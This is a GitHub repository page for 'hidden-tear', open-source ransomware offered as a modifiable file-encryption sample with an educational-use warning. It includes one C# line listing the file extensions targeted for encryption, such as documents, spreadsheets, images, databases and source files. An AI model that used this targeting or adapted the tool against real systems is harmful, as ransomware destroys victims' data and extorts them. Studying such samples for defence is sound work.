goliate / hidden-tear

ransomware open-sources
729 stars 389 forks source link
     _     _     _     _              _                  
    | |   (_)   | |   | |            | |                 
    | |__  _  __| | __| | ___ _ __   | |_ ___  __ _ _ __ 
    | '_ \| |/ _` |/ _` |/ _ \ '_ \  | __/ _ \/ _` | '__|
    | | | | | (_| | (_| |  __/ | | | | ||  __/ (_| | |   
    |_| |_|_|\__,_|\__,_|\___|_| |_|  \__\___|\__,_|_|   

It's a ransomware-like file crypter sample which can be modified for specific purposes.


Demonstration Video



var validExtensions = new[]{".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"};

Legal Warning

While this may be helpful for some, there are significant risks. hidden tear may be used only for Educational Purposes. Do not use it as a ransomware! You could go to jail on obstruction of justice charges just for running hidden tear, even though you are innocent.